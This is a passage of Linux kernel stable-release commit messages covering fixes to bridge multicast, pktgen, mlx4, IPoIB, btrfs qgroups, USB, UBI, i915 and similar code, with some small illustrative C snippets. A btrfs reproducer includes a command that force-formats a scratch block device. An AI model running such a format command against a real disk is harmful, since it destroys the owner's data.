At this point we have mcast enabled and eth1 as a perm router (value = 2)
but it is not in the router list which is incorrect.
After this change:
1. $ echo 0 > /sys/class/net/br0/bridge/multicast_snooping
2. $ ip l set eth1 down
^ This step deletes the interface from the router list
3. $ ip l set eth1 up
^ This step does not add it again because mcast snooping is disabled
4. $ echo 1 > /sys/class/net/br0/bridge/multicast_snooping
5. $ bridge -d -s mdb show
router ports on br0: eth1
Note: we can directly do br_multicast_enable_port for all because the
querier timer already has checks for the port state and will simply
expire if it's in blocking/disabled. See the comment added by
commit 9aa6638216 ("bridge: multicast: add a comment to
br_port_state_selection about blocking state")
Fixes: 561f1103a2 ("bridge: Add multicast_snooping sysfs toggle")
Reported-by: Satish Ashok <sashok@cumulusnetworks.com>
Signed-off-by: Nikolay Aleksandrov <nikolay@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 9a0b1e8ba4 ]
After Jesper commit back in linux-3.18, we trigger a lockdep
splat in proc_create_data() while allocating memory from
pktgen_change_name().
This patch converts t->if_lock to a mutex, since it is now only
used from control path, and adds proper locking to pktgen_change_name()
1) pktgen_thread_lock to protect the outer loop (iterating threads)
2) t->if_lock to protect the inner loop (iterating devices)
Note that before Jesper's patch, pktgen_change_name() was lacking proper
protection, but lockdep was not able to detect the problem.
Fixes: 8788370a1d ("pktgen: RCU-ify "if_list" to remove lock in next_to_run()")
Reported-by: John Sperbeck <jsperbeck@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 958b3d396d ]
In cases where the number of tx rings is not a multiple of the number of
rx rings, the tx completion event will be handled on a different core
from the transmit and population of the ring. Races on the ring will
lead to a double-free of the page, and possibly other corruption.
The rings are initialized by default with a valid multiple of rings,
based on the number of cpus, therefore an invalid configuration requires
ethtool to change the ring layout. For instance 'ethtool -L eth0 rx 9 tx
8' will cause packets received on rx0, and XDP_TX'd to tx48, to be
completed on cpu3 (48 % 9 == 3).
Resolve this discrepancy by shifting the irq for the xdp tx queues to
start again from 0, modulo rx_ring_num.
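As a rough standalone illustration of the ring/cpu arithmetic above (the ring
numbers come from the ethtool example in this log; the mapping helpers are
illustrative, not the driver's code):
#include <stdio.h>
int main(void)
{
        int rx_ring_num = 9;    /* ethtool -L eth0 rx 9 tx 8 */
        int xdp_tx_ring = 48;   /* illustrative: absolute index of the XDP_TX ring paired with rx0 */
        int xdp_index = 0;      /* its index among the xdp tx rings after the fix */
        /* before: completion irq derived from the absolute tx ring number */
        printf("before the fix: completes on cpu %d\n", xdp_tx_ring % rx_ring_num);     /* 3 */
        /* after: xdp tx irqs start again from 0, modulo rx_ring_num */
        printf("after the fix:  completes on cpu %d\n", xdp_index % rx_ring_num);       /* 0, same as rx0 */
        return 0;
}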
Fixes: 9ecc2d8617 ("net/mlx4_en: add xdp forwarding and data write support")
Reported-by: Jesper Dangaard Brouer <brouer@redhat.com>
Signed-off-by: Brenden Blanco <bblanco@plumgrid.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit fc791b6335 ]
After the commit 9207f9d45b ("net: preserve IP control block
during GSO segmentation"), the GSO CB and the IPoIB CB conflict.
That destroys the IPoIB address information cached there,
causing a severe performance regression, as better described here:
http://marc.info/?l=linux-kernel&m=146787279825501&w=2
This change moves the data cached by the IPoIB driver from the
skb control block into the IPoIB hard header, as done before
the commit 936d7de3d7 ("IPoIB: Stop lying about hard_header_len
and use skb->cb to stash LL addresses").
In order to avoid GRO issues, on packet reception the IPoIB driver stashes
into the skb a dummy pseudo header, so that the received packets actually
have a hard header matching the declared length.
To avoid changing the connected mode maximum mtu, the allocated
head buffer size is increased by the pseudo header length.
After this commit, IPoIB performance is back to its pre-regression
value.
v2 -> v3: rebased
v1 -> v2: avoid changing the max mtu, increasing the head buf size
Fixes: 9207f9d45b ("net: preserve IP control block during GSO segmentation")
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a220445f9f ]
The goal of the patch is to fix this scenario:
ip link add dummy1 type dummy
ip link set dummy1 up
ip link set lo down ; ip link set lo up
After that sequence, the local route to the link layer address of dummy1 is
not there anymore.
When the loopback is set down, all local routes are deleted by
addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still
exists, because the corresponding idev has a reference on it. After the rcu
grace period, dst_rcu_free() is called, and thus ___dst_free(), which will
set obsolete to DST_OBSOLETE_DEAD.
In this case, init_loopback() is called before dst_rcu_free(), thus
obsolete is still set to something <= 0. So, the function doesn't add the
route again. To avoid that race, let's check the rt6 refcnt instead.
Fixes: 25fb6ca4ed ("net IPv6 : Fix broken IPv6 routing table after loopback down-up")
Fixes: a881ae1f62 ("ipv6: don't call addrconf_dst_alloc again when enable lo")
Fixes: 33d99113b1 ("ipv6: reallocate addrconf router for ipv6 address when lo device up")
Reported-by: Francesco Santoro <francesco.santoro@6wind.com>
Reported-by: Samuel Gauthier <samuel.gauthier@6wind.com>
CC: Balakumaran Kannan <Balakumaran.Kannan@ap.sony.com>
CC: Maruthi Thotad <Maruthi.Thotad@ap.sony.com>
CC: Sabrina Dubroca <sd@queasysnail.net>
CC: Hannes Frederic Sowa <hannes@stressinduktion.org>
CC: Weilong Chen <chenweilong@huawei.com>
CC: Gao feng <gaofeng@cn.fujitsu.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 68d00f332e ]
The commit ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel
endpoints.") introduces support for wildcards in tunnel endpoints,
but in some rare circumstances ip6_tnl_lookup selects the wrong tunnel
interface, relying only on the source or destination address of the packet
and not checking for the presence of a wildcard in the tunnel endpoints.
Later in ip6_tnl_rcv these packets can be discarded because of a difference
in ipproto even if the fallback device has the proper ipproto configuration.
This patch adds checks of the wildcard endpoint in the tunnel, avoiding such
behavior.
Fixes: ea3dc9601b ("ip6_tunnel: Add support for wildcard tunnel endpoints.")
Signed-off-by: Vadim Fedorenko <junk@yandex-team.ru>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3c293f4e08 ]
phy_start() is used to indicate that the PHY is now ready to do its
work. The state is changed, normally to PHY_UP, which means that both
the MAC and the PHY are ready.
If the phy driver is using polling, when the next poll happens, the
state machine notices the PHY is now in PHY_UP, and kicks off
auto-negotiation, if needed.
If however, the PHY is using interrupts, there is no polling. The phy
is stuck in PHY_UP until the next interrupt comes along. And there is
no reason for the PHY to interrupt.
Have phy_start() schedule the state machine to run, which both speeds
up the polling use case, and makes the interrupt use case actually
work.
This problem exists whenever there is a state change which will not
cause an interrupt. Trigger the state machine in these cases,
e.g. phy_error().
Signed-off-by: Andrew Lunn <andrew@lunn.ch>
Cc: Kyle Roeschley <kyle.roeschley@ni.com>
Tested-by: Kyle Roeschley <kyle.roeschley@ni.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ab102b80ce ]
Krister reported a kernel NULL pointer dereference after
tcf_action_init_1() invokes a_o->init(). It is a race condition where one
thread calls tcf_register_action() and initializes the netns data after
putting the act ops in the global list, while the other thread searches the
list and then calls a_o->init(net, ...).
Fix this by moving the pernet ops registration before making
the action ops visible. This is fine because: a) we don't
rely on act_base in pernet ops->init(), b) in the worst case we
have a fully initialized netns but ops is still not ready so
new actions still can't be created.
Reported-by: Krister Johansen <kjlx@templeofstupid.com>
Tested-by: Krister Johansen <kjlx@templeofstupid.com>
Cc: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 02a9079c66 ]
The reserved field precise_offset->rsv is not cleared before being
copied to user space, leaking kernel stack memory. Clear the struct
before it's copied.
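A minimal userspace sketch of the pattern being fixed, assuming an
illustrative reply struct (not the actual PTP ioctl structure); only the
clear-before-copy idea matters:
#include <stdio.h>
#include <string.h>
struct offset_reply {
        long long device_time;
        long long system_time;
        unsigned int rsv[4];    /* reserved, must not leak stack contents */
};
int main(void)
{
        struct offset_reply reply;
        /* clear the whole struct before filling it and copying it out,
         * so the reserved words are guaranteed to be zero */
        memset(&reply, 0, sizeof(reply));
        reply.device_time = 1000;
        reply.system_time = 1001;
        printf("rsv[0]=%u rsv[3]=%u\n", reply.rsv[0], reply.rsv[3]);
        return 0;
}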
Signed-off-by: Vlad Tsyrklevich <vlad@tsyrklevich.net>
Acked-by: Richard Cochran <richardcochran@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d35c99ff77 ]
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.
Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.
The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.
On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT.
While we are at it, since we do an order-3 allocation, allow using
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.
iproute2 already uses 32KB recvmsg() buffer sizes.
Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)
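For reference, a small standalone calculation (assuming 4 KiB pages and the
~320 byte skb_shared_info overhead quoted above) shows why a 16384 byte
request ends up as an order-3 allocation:
#include <stdio.h>
int main(void)
{
        unsigned long page = 4096;
        unsigned long want = 16384 + 320;       /* payload + assumed skb_shared_info overhead */
        unsigned long size = page;
        int order = 0;
        while (size < want) {   /* the buddy allocator rounds up to 2^order pages */
                size *= 2;
                order++;
        }
        printf("order-%d (%lu bytes)\n", order, size);  /* order-3, 32768 bytes */
        return 0;
}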
Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 6664498280 ]
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but the prot_hook which
was registered as part of fanout_add is not removed. Call fanout_release() on a
NETDEV_UNREGISTER, which removes the prot_hook and removes the fanout from the
fanout_list.
This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()
Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 93409033ae ]
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.
The following sequence of commands will reproduce the issue:
ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr
This creates an upper/lower tree of (excuse the poor ASCII art):
/---eth0.100-eth0
mac0-testbr-
\---eth0.200-eth0
When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.
This change adds reference count propagation so things are handled properly.
Matthias Schiffer reported a similar crash in batman-adv:
https://github.com/freifunk-gluon/gluon/issues/680
https://www.open-mesh.org/issues/247
which this patch also seems to resolve.
Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit f39acc84aa ]
Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
case where the input skb data pointer does not point at the mac header:
- They're doing push/pop, but fail to properly unwind data back to its
original location.
For example, in the skb_vlan_push case, any subsequent
'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
BEFORE start of frame, leading to bogus frames that may be transmitted.
- They update rcsum per the added/removed 4 byte tag.
Alas, if data is originally after the vlan/eth headers, then these
bytes were already pulled out of the csum.
OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
presents no issues.
act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
at network header (upon ingress).
Other callers (ovs, bpf) already adjust skb->data to the mac_header.
This patch fixes act_vlan to point to the mac_header prior to calling the
skb_vlan_*() functions, as the other callers do.
Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 63d75463c9 ]
The commit 879c7220e8 ("net: pktgen: Observe needed_headroom
of the device") increased the 'pkt_overhead' field value by
LL_RESERVED_SPACE.
As a side effect the generated packet size, computed as:
/* Eth + IPh + UDPh + mpls */
datalen = pkt_dev->cur_pkt_size - 14 - 20 - 8 -
pkt_dev->pkt_overhead;
is decreased by the same value.
The above slightly changed the behavior for existing pktgen users
and made the procfs interface somewhat inconsistent.
Fix it by restoring the previous pkt_overhead value and using
LL_RESERVED_SPACE as extralen in skb allocation.
Also, change pktgen_alloc_skb() to only partially reserve
the headroom to allow the caller to prefetch from ll header
start.
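A small standalone sketch of the size arithmetic above; the LL_RESERVED_SPACE
value below is just an example, and the real pkt_overhead also includes
MPLS/VLAN contributions:
#include <stdio.h>
int main(void)
{
        int cur_pkt_size = 300;
        int base_overhead = 0;          /* illustrative pkt_overhead before 879c7220e8 */
        int ll_reserved_space = 16;     /* example value, device dependent */
        /* Eth + IPh + UDPh + mpls */
        int datalen_old = cur_pkt_size - 14 - 20 - 8 - base_overhead;
        int datalen_new = cur_pkt_size - 14 - 20 - 8 -
                          (base_overhead + ll_reserved_space);
        printf("datalen before: %d, after 879c7220e8: %d\n",
               datalen_old, datalen_new);
        /* the fix restores the old datalen and passes the reserved space
         * as extra headroom to the skb allocation instead */
        return 0;
}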
v1 -> v2:
- fixed some typos in the comments
Fixes: 879c7220e8 ("net: pktgen: Observe needed_headroom of the device")
Suggested-by: Ben Greear <greearb@candelatech.com>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b82d44d784 ]
If the mac address origin is not the device tree, you can only safely assign
a mac address after "link up" of the device. If the link is off the clocks are
disabled, and because of issues assigning registers while the clocks are off,
the new mac address cannot be written in .ndo_set_mac_address() on some SoCs.
This fix sets the mac address unconditionally in fec_restart(...) and
ensures consistency between fec registers and the network layer.
Signed-off-by: Gavin Schenk <g.schenk@eckelmann.de>
Acked-by: Fugang Duan <fugang.duan@nxp.com>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Fixes: 9638d19e48 ("net: fec: add netif status check before set mac address")
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit cf0ea4da4c upstream.
Like many similar devices it needs a quirk to work.
Issuing the request gets the device into an irrecoverable state.
Signed-off-by: Oliver Neukum <oneukum@suse.com>
Signed-off-by: Jiri Kosina <jkosina@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6c6ead141 upstream.
After commit a4675fbc4a (cpufreq: intel_pstate: Replace timers with
utilization update callbacks) the cpufreq governor callbacks may not
be invoked on NOHZ_FULL CPUs and, in particular, switching to the
"performance" policy via sysfs may not have any effect on them. That
is a problem, because it usually is desirable to squeeze the last
bit of performance out of those CPUs, so work around it by setting
the maximum P-state (within the limits) in intel_pstate_set_policy()
upfront when the policy is CPUFREQ_POLICY_PERFORMANCE.
Fixes: a4675fbc4a (cpufreq: intel_pstate: Replace timers with utilization update callbacks)
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Acked-by: Srinivas Pandruvada <srinivas.pandruvada@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 40b6e61ac7 upstream.
Commit e96a8a3bb6 ("UBI: Fastmap: Do not add vol if it already
exists") introduced a bug by changing the possible error codes returned
by add_vol():
- this function no longer returns NULL in case of allocation failure
but returns ERR_PTR(-ENOMEM)
- when a duplicate entry in the volume RB tree is found it returns
ERR_PTR(-EEXIST) instead of ERR_PTR(-EINVAL)
Fix the tests done on the add_vol() return value to match this new behavior.
Fixes: e96a8a3bb6 ("UBI: Fastmap: Do not add vol if it already exists")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Acked-by: Sheng Yong <shengyong1@huawei.com>
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0b34c261e2 upstream.
While freeing qgroup->reserved resources, we must check that
the page has not been invalidated by a truncate operation,
by checking if the page is still dirty, before reducing the
qgroup resources. Resources in such a case are freed when
the entire extent is released by the delayed_ref.
This fixes a double accounting while releasing resources
in case of truncating a file, reproduced by the following testcase.
SCRATCH_DEV=/dev/vdb
SCRATCH_MNT=/mnt
mkfs.btrfs -f $SCRATCH_DEV
mount -t btrfs $SCRATCH_DEV $SCRATCH_MNT
cd $SCRATCH_MNT
btrfs quota enable $SCRATCH_MNT
btrfs subvolume create a
btrfs qgroup limit 500m a $SCRATCH_MNT
sync
for c in {1..15}; do
    dd if=/dev/zero bs=1M count=40 of=$SCRATCH_MNT/a/file;
done
sleep 10
sync
sleep 5
touch $SCRATCH_MNT/a/newfile
echo "Removing file"
rm $SCRATCH_MNT/a/file
Fixes: b9d0b38928 ("btrfs: Add handler for invalidate page")
Signed-off-by: Goldwyn Rodrigues <rgoldwyn@suse.com>
Reviewed-by: Qu Wenruo <quwenruo@cn.fujitsu.com>
Signed-off-by: David Sterba <dsterba@suse.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 42acfc6615 upstream.
In csi_J(3), the third parameter of scr_memsetw (vc_screenbuf_size) is
divided by 2 inappropriately. But scr_memsetw expects a size, not a
count, because it divides the size by 2 on its own before doing the actual
memset-by-words.
So remove the bogus division.
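A small userspace analogue of the size-vs-count mixup (memset_by_words stands
in for scr_memsetw here; it is not the kernel helper):
#include <stdio.h>
#include <stddef.h>
/* like scr_memsetw: takes a size in BYTES and divides by 2 itself */
static void memset_by_words(unsigned short *s, unsigned short v, size_t bytes)
{
        size_t count = bytes / 2;
        while (count--)
                *s++ = v;
}
int main(void)
{
        unsigned short screenbuf[8] = { 0 };
        size_t vc_screenbuf_size = sizeof(screenbuf);   /* 16 bytes */
        /* buggy caller: passes size / 2, so only half the buffer is cleared */
        memset_by_words(screenbuf, 0x0720, vc_screenbuf_size / 2);
        printf("last cell after buggy call: 0x%04x\n", (unsigned)screenbuf[7]); /* 0x0000 */
        /* fixed caller: pass the full size in bytes */
        memset_by_words(screenbuf, 0x0720, vc_screenbuf_size);
        printf("last cell after fixed call: 0x%04x\n", (unsigned)screenbuf[7]); /* 0x0720 */
        return 0;
}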
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Petr Písař <ppisar@redhat.com>
Fixes: f8df13e0a9 (tty: Clean console safely)
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e4e70a147a upstream.
Pipelines can only be run if all their video nodes are streaming. Commit
b4dfb9b35a ("[media] v4l: vsp1: Stop the pipeline upon the first
STREAMOFF") fixed the pipeline stop sequence, but introduced a race
condition that makes it possible to run a pipeline after stopping the
stream on a video node by queuing a buffer on the other side of the
pipeline.
Fix this by clearing the buffers ready flag when stopping the stream,
which will prevent the QBUF handler from running the pipeline.
Fixes: b4dfb9b35a ("[media] v4l: vsp1: Stop the pipeline upon the first STREAMOFF")
Reported-by: Kieran Bingham <kieran@bingham.xyz>
Tested-by: Kieran Bingham <kieran@bingham.xyz>
Signed-off-by: Laurent Pinchart <laurent.pinchart+renesas@ideasonboard.com>
Signed-off-by: Mauro Carvalho Chehab <mchehab@s-opensource.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d8e5f0eca1 upstream.
If we configure musb with 2430 glue as a peripheral, and then rmmod
omap2430 module, we'll get the following error:
[ INFO: HARDIRQ-safe -> HARDIRQ-unsafe lock order detected ]
...
rmmod/413 [HC0[0]:SC0[0]:HE0:SE1] is trying to acquire:
(&phy->mutex){+.+.+.}, at: [<c04b9fd0>] phy_power_off+0x1c/0xb8
[ 204.678710]
and this task is already holding:
(&(&musb->lock)->rlock){-.-...}, at: [<bf3a482c>]
musb_gadget_stop+0x24/0xec [musb_hdrc]
which would create a new lock dependency:
(&(&musb->lock)->rlock){-.-...} -> (&phy->mutex){+.+.+.}
...
This is because some glue layers expect musb_platform_enable/disable
to be called with spinlock held, and 2430 glue layer has USB PHY on
the I2C bus using a mutex.
We could fix the glue layers to take the spinlock, but we still have
a problem of musb_platform_enable/disable being called in an unbalanced
manner. So that would still lead into USB PHY enable/disable related
problems for the omap2430 glue layer.
While it makes sense to only enable USB PHY when needed from PM point
of view, in this case we just can't do it yet without breaking things.
So let's just revert phy_enable/disable related changes instead and
reconsider this after we have fixed musb_platform_enable/disable to
be balanced.
Fixes: a83e17d0f7 ("usb: musb: Improve PM runtime and phy handling for 2430 glue layer")
Reviewed-by: Laurent Pinchart <laurent.pinchart@ideasonboard.com>
Signed-off-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: Bin Liu <b-liu@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 991d5add50 upstream.
After commit b09b5224fe ("usb: chipidea: implement platform shutdown
callback") and commit 43a404577a ("usb: chipidea: host: set host to
be null after hcd is freed") a NULL pointer dereference is caused
on i.MX23 during shutdown. So ensure that role is set to CI_ROLE_END and
we finish interrupt handling before the hcd is deallocated. This avoids
the NULL pointer dereference.
Suggested-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Stefan Wahren <stefan.wahren@i2se.com>
Fixes: b09b5224fe ("usb: chipidea: implement platform shutdown callback")
Signed-off-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51fbc7c06c upstream.
In commit 2abd9d5fa6 ("usb: dwc3: ep0: Add chained TRB support"), the
size of the memory allocated with 'dma_alloc_coherent()' has been modified
but the corresponding calls to 'dma_free_coherent()' have not been updated
accordingly.
This has been spotted with coccinelle, using the following script:
////////////////////
@r@
expression x0, x1, y0, y1, z0, z1, t0, t1, ret;
@@
* ret = dma_alloc_coherent(x0, y0, z0, t0);
...
* dma_free_coherent(x1, y1, ret, t1);
@script:python@
y0 << r.y0;
y1 << r.y1;
@@
if y1.find(y0) == -1:
    print "WARNING: sizes look different: '%s' vs '%s'" % (y0, y1)
////////////////////
Fixes: 2abd9d5fa6 ("usb: dwc3: ep0: Add chained TRB support")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0733424c9b upstream.
Exported pwm channels aren't removed before the pwmchip and are
leaked. This results in invalid sysfs files. This fix removes
all exported pwm channels before chip removal.
Signed-off-by: David Hsu <davidhsu@google.com>
Fixes: 76abbdde2d ("pwm: Add sysfs interface")
Signed-off-by: Thierry Reding <thierry.reding@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e0299908d6 upstream.
If we "goto out;" then it calls display_timings_release(timings);
Since "timings" is NULL, that's going to oops. Just return directly.
Fixes: 420a488278 ('video: fbdev: pxafb: initial devicetree conversion')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Acked-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ecbfa8eaba upstream.
scan_pool() does not mark the PEB for scrubbing when bitflips are
detected in the EC header of a free PEB (VID header region left to
0xff).
Make sure we scrub the PEB in this case.
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes: dbb7d2a88d ("UBI: Add fastmap core")
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d19375b58 upstream.
Justin and Chris spotted that iptables NFLOG target was broken when they
upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
"results in segfaults in ulogd-2.0.5".
Because "struct nf_loginfo li;" is a local variable, and flags will be
filled with garbage value, not inited to zero. So if it contains 0x1,
packets will not be logged to the userspace anymore.
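A minimal sketch of the uninitialized-local pattern involved, with an
illustrative struct (not the real nf_loginfo layout):
#include <stdio.h>
#include <string.h>
struct my_loginfo {
        unsigned char group;
        unsigned char threshold;
        unsigned short flags;   /* the buggy code left this uninitialized */
};
int main(void)
{
        struct my_loginfo li;
        /* the fix: zero the whole struct before setting individual members,
         * so flags (and any padding) cannot carry stack garbage */
        memset(&li, 0, sizeof(li));
        li.group = 1;
        li.threshold = 1;
        printf("flags = %u\n", (unsigned)li.flags);     /* guaranteed 0 */
        return 0;
}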
Fixes: 7643507fe8 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
Reported-by: Justin Piszcz <jpiszcz@lucidpixels.com>
Reported-by: Chris Caputo <ccaputo@alt.net>
Tested-by: Chris Caputo <ccaputo@alt.net>
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6a676fb69d upstream.
Instantiated I2C device nodes are marked with OF_POPULATE. This was
introduced in 4f001fd301. On unloading, loaded device nodes will of
course be unmarked. The problem is nodes that fail during
initialisation: if a node fails, it won't be unloaded and hence not be
unmarked.
If an I2C driver module is unloaded and reloaded, it will skip nodes that
failed before.
Skip device nodes that are already populated and mark them only in case
of success.
Fixes: 4f001fd301 ("i2c: Mark instantiated device nodes with OF_POPULATE")
Signed-off-by: Ralf Ramsauer <ralf@ramses-pyramidenbau.de>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Acked-by: Pantelis Antoniou <pantelis.antoniou@konsulko.com>
[wsa: use 14-digit commit sha]
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e3b9e6e3a9 upstream.
Broadwell and newer actually compress up to 2560 lines instead of 2048
(as documented in the FBC_CTL page). If we don't take this into
consideration we end up reserving too little stolen memory for the
CFB, so we may allocate something else (such as a ring) right after
what we reserved, and the hardware will overwrite it with the contents
of the CFB when FBC is active, causing GPU hangs. Another possibility
is that the CFB may be allocated at the very end of the available
space, so the CFB will overlap the reserved stolen area, leading to
FIFO underruns.
This bug has always been a problem on BDW (the only affected platform
where FBC is enabled by default), but it's much easier to reproduce
since the following commit:
commit c58b735fc7
Author: Chris Wilson <chris@chris-wilson.co.uk>
Date: Thu Aug 18 17:16:57 2016 +0100
drm/i915: Allocate rings from stolen
Of course, you can only reproduce the bug if your screen is taller
than 2048 lines.
Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=98213
Fixes: a98ee79317 ("drm/i915/fbc: enable FBC by default on HSW and BDW")
Signed-off-by: Paulo Zanoni <paulo.r.zanoni@intel.com>
Reviewed-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/1477065346-13736-1-git-send-email-paulo.r.zanoni@intel.com
(cherry picked from commit 79f2624b1b)
Signed-off-by: Jani Nikula <jani.nikula@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 198c5ee3c6 upstream.
The VBT provides the platform a way to mix and match the DDI ports vs.
AUX channels. Currently we only trust the VBT for DDI E, which has no
corresponding AUX channel of its own. However it is possible that some
board might use some non-standard DDI vs. AUX port routing even for
the other ports. Perhaps for signal routing reasons or something.
So let's generalize this and trust the VBT for all ports.
For now we'll limit this to DDI platforms, as we trust the VBT a bit
more there anyway when it comes to the DDI ports. I've structured
the code in a way that would allow us to easily expand this to
other platforms as well, by simply filling in the ddi_port_info.
v2: Drop whitespace changes, keep MISSING_CASE() for unknown
